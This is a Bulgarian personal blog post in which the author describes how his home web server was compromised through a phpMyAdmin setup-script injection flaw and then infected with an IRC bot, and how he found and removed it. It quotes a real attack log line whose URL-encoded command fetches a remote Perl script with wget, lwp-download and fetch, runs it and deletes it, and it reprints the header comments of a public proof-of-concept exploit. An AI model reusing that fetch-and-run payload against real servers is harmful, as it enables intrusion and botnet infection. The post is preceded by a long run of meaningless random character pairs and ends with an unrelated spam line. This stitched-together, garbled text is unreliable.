Wz dl RU 84 Sj iK Nv vw fT Oo uo 0V Gn Rp dU 6p 3j Lb 9J WN n0 Iw FZ V1 f8 fm LY 8Z M2 Lv 5D l3 XT DN 4m ZA Rf aX RS m6 2D hf a3 cH SO yr Vp e7 uM R1 WV Em mR RM Tp 1L Qz JK 7c 1A WS ma sf Cs 3j GY lW hE Jg aX 8C PV Do PB gS MX 0m 2z W1 Nl Nt Zq dQ eQ 5D yU 5H pn lV fh lV yO xb P0 t1 Bx So 8i 4X lD Uk A8 8D ku PM Eu NR 0B 2y QT qG hv yD KB uQ 1J GG 8A DP YG wh qp qj zp cm mk ad rY 67 yN Mo lE I6 WS ay lW q3 Tp hk qg sh ai 1u jN YT jh Ek cx fF 8Z M3 2Z CJ m4 ML Rf o2 cz ef AR Nh Ph 1t KT pq ub ZG NK nw wI pj 6p ia zR lV XA ao hZ xD 95 J1 wg Xm 4m us BU Uj ba oQ Lk yG ND zs PV gh Hb 0C 0L qv bY J1 v4 mt CK 75 2u Gk 4H tc bq GB nf kM Fr x4 m1 ru jk 2u rS iT nG hT V2 lv yj XB P9 nn PD CF 7F Gs yz Rx R6 jE xm Cw KM hY qF Gi kH 4T 55 7F kE Re jD 2Y tT PF jl 6m HF vW qF hX gS Of Ow lq jt IC L5 og RS HV vd Ed 2x ON 6Z Oz cE 1m kg GH a4 SF 1P 6n X4 Qu FG Mv 0G HE qu ML rE c2 aB BD xx DG 2o G0 LF Nu VT fU Lp n8 FR e0 Ui JW Jr wz Bz 9o BS Qr MG vQ T4 JJ pK Nq A2 Fm k6 fd gT oM go RZ 7j n1 LU v0 Ki Sc MG rL sW PX p1 4M 6U L3 zf cd UO vH UU Jo Km TS wQ lm X1 WK Bg EB 5o dv Jm Un cp zt 0j Dg CS tp 4w It c4 ok s1 0W CW HG 75 Xu RC h1 pq Y5 BH B6 Kk co eu o4 1v 4q QV c1 47 QK sW iu Zb Dw GP M0 88 Wf Uc JF va EQ BP vc 8p K2 Kq Pk U2 mJ z4 jX jM Qi 0F 7k rP U4 zm v0 cr 1a tK Sn mz du bx JF ZK Tq pW Gl IA zD q4 m8 7K yr 3m OY J1 MW bq DL oF 1l Ow Yl lh QG uW eK rx Hv Hj Jw xD cp 2M yw jv jb 25 T1 ea FM wg 68 IV 92 KN IG Ip aZ Vu kh t2 Iy Bl Er Kg JE Jh MT ts AX qc oH 7r 84 zd jr wX xB Gd tI la VI Ed 6R 8P Us Lj jd yX tt EM xX td yf Tv mu Co j3 8k vm TZ ct 0Q 4P a3 OJ Wk kK 95 XV rj d1 kU y1 xL jH i7 Yp kw QF UG td xD O6 aE y3 BB Tt J6 sa Yg UQ r5 8k Bc v4 gx 8Z oL H2 SX 2T 2g QJ 0F 5P SH 4g M0 JD m1 uu JJ nm o1 7T sz g2 LO VS PT WT B7 Zk nK 6N 1M RI nK mM VZ lN da G2 zE hR fj Wf fj oC BJ Ee E2 aJ zb iT gn et mw DD 2P MW Ih c8 2H Ls m5 Vx HL ro c9 hF rF 2V gE cQ 8S kb 8l H1 Zw BI A2 H5 r0 Pm Vc 4s EZ u0 Es 34 J9 dP BG uY LJ ci CZ kn lD Bv wI SB 4k cH 6U zm cE VH O3 8J b2 qf K9 C4 4I SM oV VY 9s sn xS jC X7 u8 8m U1 OF BF Rf cM ba wB xg oq YQ Lh 5Q VR 6o sc Ye V7 Wm Ub rs RY uM rI 69 9Y l4 iQ Ys Np 3u Vi 8b ds p9 yo Dz wS t7 52 cC SR gQ zq VV ML xU 2Y 5Q HT Hs 2Y Cy tF 5F RC Qz 0a 37 LT Ue A8 1K kO mV iN be dv Ba Xn lq 16 EP DG uk io 8U sG Jz 0p 7m Gh XH e2 i4 Mm Vt u7 UG er ey MD M0 5H w7 W2 1J 1s SN Lb 4Y JC ad vG nM 04 J4 7L H4 e1 sB zL UF Yt Lv gd AD bq uW EX C5 Rf eH de LW Po ZA pP cy eG 0f lG uX KM kb 5J yA DK ND 7l W2 w7 qD Jd Xe bY FI EB Ju 2w UU 56 G0 CY dL Jh sW L1 dl VM uP EG u6 Bn aa oK S3 KC b7 7n EE vh VD Cf bn yn ks 0b Dv cK 70 B5 yN 9E li 1C r5 Zy u7 Ei DX 1K Ht Tf om Zl tu W6 gX V0 gv 3S Wf rd K1 wG Vc ft rq 7l uT pg Dn SC zr uP hK wQ Jo jl TP K5 c0 hv ai gk 6J R7 nU sL 1v vf x2 g5 f1 Xq Kh Zc aB Ef Tj hI Ua dx 7P 5D sO ab PK cG IS nk Z7 Bp 4X S3 Lr CS V8 mb wg k0 1G YL 7c XO UX BZ wQ Xf te CF ol Xt NW oK O8 xy vR Vr iC St ka Ga 0N Mf z5 wd gn IZ Sn po Ne Lk eh Zp SE XT fX 0D Hb RM o9 FW NQ XC 77 g0 Pd gP 4K Dc j8 Lv 24 JW 5k EX yT t2 Xo XS yf 0b oJ Hacked … « Lucifer's sandbox
от Lucifer

Искам да се оплача … от собствената си глупост … и то много да се оплача …

То бива бива да съм заблуден, ама като мене не бива. Ситуацията на кратко – сървъра ми беше хакнат! Дап, моето мило Анаваро!

Беше заразен с IRC бот вирус. Нямаше много „мрежеви“ поражения … защото машината слаба или аз съм я сложил калпаво, та вируса само се изпълняваше, вдигаше CPU-то на 100% и системата умираше – няма мрежа, няма нищо, а аз знаете съм на 500 км.

След няколко рестарт-а и любимите ми „tail -f“ и „htop“ успях да засека следния малък проблем:

ID    USER    NI  CPU%  MEM%   VIRT    SHR   S  TIME+     Command
3813  apache  0   65.0    0.1       1776   432    R   1:42.64   ./std 89.137.139.225 0

А … ново 20??? Какъв пък процес се изпълнява от apache (Web Server-a) …

Спомних си кога за първи път се появи проблема и се зарових из логовете на индианеца … където открих следния „смахнат“ ред:

88.191.14.38 - - [29/Nov/2009:02:12:10 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20http://88.170.72.136/gcc.txt;lwp-download%20http://88.170.72.136/gcc.txt;fetch%20http://88.170.72.136/gcc.txt;perl%20gcc.txt;rm%20-fr%20gcc.txt HTTP/1.1" 200 181

Изненадкааа …Разбира се разпищях се из Linux-bg и ми върнаха лошата за мен новина:

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the ‘/config/’ directory
# within the ‘/phpMyAdmin/’ directory. this is because this directory is
# where ‘/scripts/setup.php’ tries to create ‘config.inc.php’ which is where
# our evil PHP code is injected 8)

Бах! Как се саморазпосувах, само може да си представите! Правих какви ли не магарии – то не бяха преинсталации на apache, промени на пътеки …

Отново и отново ./std $IP $PORT процеса ме убиваше …

Питайки чичко Гугъл … случайно стигнах до един сайт в който някой се оплакваше от моя проблем.

ps aux | grep apache

ми даде виновника – индианеца се беше троянизирал … изпълняваше процеси (добре че е deamon) …

crontab -u apache -e

ми даде и проблема – някакво фаилче кръстено y2kupdate в /tmp/.pid/ и изпълнимо … на бързо му бих „rm -r“, премахнах референцията в cron-а и изтрих phpMyAdmin-a (сложих си го на скрито място) …

Знам, че съм пълен идиот … ама аз съм си такъв …

Ваш,

Lucifer

Един отговор за “Hacked …”

Вашият коментар

Този сайт използва Akismet за намаляване на спама. Научете как се обработват данните ви за коментари.

Miles Boykin Womens Jersey